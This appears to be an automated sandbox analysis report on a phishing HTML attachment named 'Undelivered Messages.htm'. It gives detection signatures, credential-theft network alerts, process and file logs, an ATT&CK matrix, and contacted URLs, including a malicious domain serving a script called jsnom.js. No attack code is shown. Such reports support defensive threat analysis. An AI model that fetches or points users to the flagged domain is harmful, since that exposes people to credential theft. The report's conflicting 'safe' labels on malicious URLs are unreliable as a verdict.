Edit tour

Windows Analysis Report
Undelivered Messages.htm

Overview

General Information

Sample name:	Undelivered Messages.htm
Analysis ID:	1587421
MD5:	09f4170d3874b093d9f631589ce7f997
SHA1:	e5f203df8c12049ce3dcedd1193b55de2de2df55
SHA256:	a21a03467b36c167b4a58df8bd89dfeb2f060f442ed9805bfb873fc0a80db0fb
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

AI detected suspicious Javascript

Detected javascript redirector / loader

HTML Script injector detected

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Drops PE files

Drops PE files to the windows directory (C:\Windows)

HTML page contains hidden javascript code

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains more sections than normal

PE file contains sections with non-standard names

Classification

Process Tree

System is w10x64

chrome.exe (PID: 4416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Undelivered Messages.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=2432,i,13108727720244924784,14150484623795101669,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Suricata Signatures

ET PHISHING Generic Credential Phish Landing Page (jsnom.js)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:14:50.964252+0100	2056316	1	Successful Credential Theft Detected	192.168.2.4	49741	104.21.84.200	443	TCP
2025-01-10T11:14:52.287123+0100	2056316	1	Successful Credential Theft Detected	192.168.2.4	49746	172.67.196.150	443	TCP

HTTP traffic detected: POST /report/v4?s=stcfEbrWmv4Q01B7ItBb8bFNbOn9mDEPJWIv2Xh3FZwCXnW9i5STS23l%2BTSBgiDQST321SfB5Q1BlxREkQnTY%2BWrX1QgRlCwlwpgpvpDJl2qypos4sOV%2BJgeRV%2BrQNIif6QnHkxmOg%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 398Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: optimization-hints.pb.0.dr	String found in binary or memory: https://123milhas.com/v2/busca/confirmacao-pedido/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://checkout-new.dafiti.com.br/success/index.html.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://checkout.casasbahia.com.br/compra-finalizada
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://checkout.extra.com.br/compra-finalizada
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://checkout.pontofrio.com.br/compra-finalizada
Source: manifest.json.0.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://comprasegura.olx.com.br/
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://comprasegura.olx.com.br/pedidos/.
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://dump-truck.appspot.com/.
Source: LICENSE.txt.0.dr	String found in binary or memory: https://easylist.to/)
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://emv-qr.googleplex.com/.
Source: LICENSE.txt.0.dr	String found in binary or memory: https://github.com/easylist)
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://google-wallet-ccr-salvador.pagmob.com.br/pay
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://m.aliexpress.com/p/second-payment/pay-result.html?.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://m.americanas.com.br/compra/pix.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://rsolomakhin.github.io/pix/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://sacolamobile.magazineluiza.com.br/#/comprovante
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://secure.epocacosmeticos.com.br/checkout/#/payment.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://secure.vivara.com.br/checkout?orderFormId=.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://shopee.com.br/payment/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.amazon.com.br/gp/buy/thankyou/handlers/display.html
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.anacapri.com.br/checkout/order-confirmation/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.arezzo.com.br/checkout/order-confirmation/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.centauro.com.br/checkouts/confirmacao/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.cobasi.com.br/checkout/review.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.elo7.com.br/buyer/order/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.fastshop.com.br/web/checkout-v2/pagamento/confirmacao.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.hering.com.br/checkout/#/payment
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.hurb.com/br/pay/checkout/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.ifood.com.br/pedidos/aguardando-pagamento/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.madeiramadeira.com.br/carrinho/finalizar-pedido/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.motorola.com.br/checkout/#/payment
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.natura.com.br/pedido-concluido/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.netshoes.com.br/checkout/confirmation/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.paodeacucar.com/checkout.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.petz.com.br/checkout/confirmation/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.riachuelo.com.br/successpage
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.schutz.com.br/checkout/order-confirmation/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.sephora.com.br/checkout/success/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.ultrafarma.com.br/checkout/confirmacao/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.zattini.com.br/checkout/confirmation/.
Source: optimization-hints.pb.0.dr	String found in binary or memory: https://www.zzmall.com.br/checkout/order-confirmation/.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50979
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 50979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\sets.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\LICENSE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\manifest.fingerprint	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\Google.Widevine.CDM.dll	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\manifest.fingerprint	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\LICENSE.txt	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\Filtering Rules	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\manifest.fingerprint	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1848037099	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1848037099\cr_en-us_500000_index.bin	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1848037099\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1848037099\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1848037099\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1848037099\manifest.fingerprint	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_585514529	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_585514529\optimization-hints.pb	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_585514529\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_585514529\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_585514529\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_585514529\manifest.fingerprint	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_platform_specific\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_platform_specific\win_x64\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_platform_specific\win_x64\widevinecdm.dll.sig	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_platform_specific\win_x64\widevinecdm.dll	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\LICENSE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\manifest.fingerprint	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\chrome_BITS_4416_766249240

Jump to behavior

Source: widevinecdm.dll.0.dr	Static PE information: Number of sections : 13 > 10
Source: Google.Widevine.CDM.dll.0.dr	Static PE information: Number of sections : 12 > 10

Source: classification engine

Classification label: mal60.phis.winHTM@30/32@12/8

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Undelivered Messages.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=2432,i,13108727720244924784,14150484623795101669,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=2432,i,13108727720244924784,14150484623795101669,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google.Widevine.CDM.dll.0.dr	Static PE information: section name: .00cfg
Source: Google.Widevine.CDM.dll.0.dr	Static PE information: section name: .gxfg
Source: Google.Widevine.CDM.dll.0.dr	Static PE information: section name: .retplne
Source: Google.Widevine.CDM.dll.0.dr	Static PE information: section name: .voltbl
Source: Google.Widevine.CDM.dll.0.dr	Static PE information: section name: _RDATA
Source: widevinecdm.dll.0.dr	Static PE information: section name: .00cfg
Source: widevinecdm.dll.0.dr	Static PE information: section name: .gxfg
Source: widevinecdm.dll.0.dr	Static PE information: section name: .retplne
Source: widevinecdm.dll.0.dr	Static PE information: section name: .rodata
Source: widevinecdm.dll.0.dr	Static PE information: section name: _RDATA
Source: widevinecdm.dll.0.dr	Static PE information: section name: malloc_h

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_platform_specific\win_x64\widevinecdm.dll			Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\Google.Widevine.CDM.dll			Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_platform_specific\win_x64\widevinecdm.dll			Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\Google.Widevine.CDM.dll			Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\LICENSE.txt

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	2 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_platform_specific\win_x64\widevinecdm.dll	0%	ReversingLabs
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\Google.Widevine.CDM.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://www.hurb.com/br/pay/checkout/.	0%	Avira URL Cloud	safe
https://www.sephora.com.br/checkout/success/.	0%	Avira URL Cloud	safe
https://secure.epocacosmeticos.com.br/checkout/#/payment.	0%	Avira URL Cloud	safe
https://www.petz.com.br/checkout/confirmation/.	0%	Avira URL Cloud	safe
https://comprasegura.olx.com.br/pedidos/.	0%	Avira URL Cloud	safe
https://checkout.extra.com.br/compra-finalizada	0%	Avira URL Cloud	safe
https://secure.vivara.com.br/checkout?orderFormId=.	0%	Avira URL Cloud	safe
https://fiveradio-newbam.com/jsnom.js	0%	Avira URL Cloud	safe
https://www.ifood.com.br/pedidos/aguardando-pagamento/.	0%	Avira URL Cloud	safe
https://checkout-new.dafiti.com.br/success/index.html.	0%	Avira URL Cloud	safe
https://www.motorola.com.br/checkout/#/payment	0%	Avira URL Cloud	safe
https://rsolomakhin.github.io/pix/.	0%	Avira URL Cloud	safe
https://www.anacapri.com.br/checkout/order-confirmation/.	0%	Avira URL Cloud	safe
https://www.hering.com.br/checkout/#/payment	0%	Avira URL Cloud	safe
https://www.schutz.com.br/checkout/order-confirmation/.	0%	Avira URL Cloud	safe
https://www.zattini.com.br/checkout/confirmation/.	0%	Avira URL Cloud	safe
https://checkout.pontofrio.com.br/compra-finalizada	0%	Avira URL Cloud	safe
https://www.cobasi.com.br/checkout/review.	0%	Avira URL Cloud	safe
https://checkout.casasbahia.com.br/compra-finalizada	0%	Avira URL Cloud	safe
https://emv-qr.googleplex.com/.	0%	Avira URL Cloud	safe
https://www.ultrafarma.com.br/checkout/confirmacao/.	0%	Avira URL Cloud	safe
https://www.arezzo.com.br/checkout/order-confirmation/.	0%	Avira URL Cloud	safe
https://123milhas.com/v2/busca/confirmacao-pedido/.	0%	Avira URL Cloud	safe
https://www.paodeacucar.com/checkout.	0%	Avira URL Cloud	safe
https://comprasegura.olx.com.br/	0%	Avira URL Cloud	safe
https://m.americanas.com.br/compra/pix.	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/Undelivered%20Messages.htm	0%	Avira URL Cloud	safe
https://www.zzmall.com.br/checkout/order-confirmation/.	0%	Avira URL Cloud	safe
https://sacolamobile.magazineluiza.com.br/#/comprovante	0%	Avira URL Cloud	safe
https://www.fastshop.com.br/web/checkout-v2/pagamento/confirmacao.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false	high
d2vgu95hoyrpkh.cloudfront.net	18.245.31.5	true	false	unknown
fiveradio-newbam.com	104.21.84.200	true	true	unknown
www.google.com	142.250.185.164	true	false	high
cdn.socket.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://fiveradio-newbam.com/jsnom.js	true	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=stcfEbrWmv4Q01B7ItBb8bFNbOn9mDEPJWIv2Xh3FZwCXnW9i5STS23l%2BTSBgiDQST321SfB5Q1BlxREkQnTY%2BWrX1QgRlCwlwpgpvpDJl2qypos4sOV%2BJgeRV%2BrQNIif6QnHkxmOg%3D%3D	false		high
https://cdn.socket.io/4.6.0/socket.io.min.js	false		high
file:///C:/Users/user/Desktop/Undelivered%20Messages.htm	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://google-wallet-ccr-salvador.pagmob.com.br/pay	optimization-hints.pb.0.dr	false		high
https://www.hurb.com/br/pay/checkout/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.sephora.com.br/checkout/success/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.ifood.com.br/pedidos/aguardando-pagamento/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.riachuelo.com.br/successpage	optimization-hints.pb.0.dr	false		high
https://comprasegura.olx.com.br/pedidos/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://secure.vivara.com.br/checkout?orderFormId=.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://secure.epocacosmeticos.com.br/checkout/#/payment.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.elo7.com.br/buyer/order/.	optimization-hints.pb.0.dr	false		high
https://checkout.extra.com.br/compra-finalizada	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://easylist.to/)	LICENSE.txt.0.dr	false		high
https://checkout-new.dafiti.com.br/success/index.html.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.madeiramadeira.com.br/carrinho/finalizar-pedido/.	optimization-hints.pb.0.dr	false		high
https://dump-truck.appspot.com/.	optimization-hints.pb.0.dr	false		high
https://creativecommons.org/compatiblelicenses	LICENSE.txt.0.dr	false		high
https://www.petz.com.br/checkout/confirmation/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://checkout.casasbahia.com.br/compra-finalizada	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.amazon.com.br/gp/buy/thankyou/handlers/display.html	optimization-hints.pb.0.dr	false		high
https://github.com/easylist)	LICENSE.txt.0.dr	false		high
https://shopee.com.br/payment/.	optimization-hints.pb.0.dr	false		high
https://www.motorola.com.br/checkout/#/payment	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://creativecommons.org/.	LICENSE.txt.0.dr	false		high
https://www.cobasi.com.br/checkout/review.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
https://www.zattini.com.br/checkout/confirmation/.	optimization-hints.pb.0.dr	false	Avira URL Cloud: safe	unknown
